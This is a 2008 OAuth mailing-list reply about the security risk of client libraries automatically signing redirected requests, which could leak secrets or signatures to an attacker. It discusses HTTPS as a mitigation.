On Mon, Nov 24, 2008 at 8:34 PM, Brian Eaton <[EMAIL PROTECTED]> wrote:
> > On Mon, Nov 24, 2008 at 11:59 AM, John Kristian <[EMAIL PROTECTED]> > wrote: > > It would be nice if OAuth client libraries automatically handled > > redirects and signed each request. > > Wearing my security hat... automatically signing redirect URLs is > risky. What if the response from the service provider is compromised? > > If you're using plaintext signatures, you leak your secrets to > wherever the attacker redirects you. > > If you're using HMAC or RSA, you leak signatures for whatever URL you > are redirected to. The attacker can force you to make near-arbitrary > signed OAuth requests. > > I suppose https is the obvious answer to this, since it guarantees the > response from the SP really came from the SP's servers. I'm also wondering what kind of compromise would allow an attacker to send a redirect with seeing the original request? > > > > > --~--~---------~--~----~------------~-------~--~----~ You received this message because you are subscribed to the Google Groups "OAuth" group. To post to this group, send email to [email protected] To unsubscribe from this group, send email to [EMAIL PROTECTED] For more options, visit this group at http://groups.google.com/group/oauth?hl=en -~----------~----~----~----~------~----~------~--~---
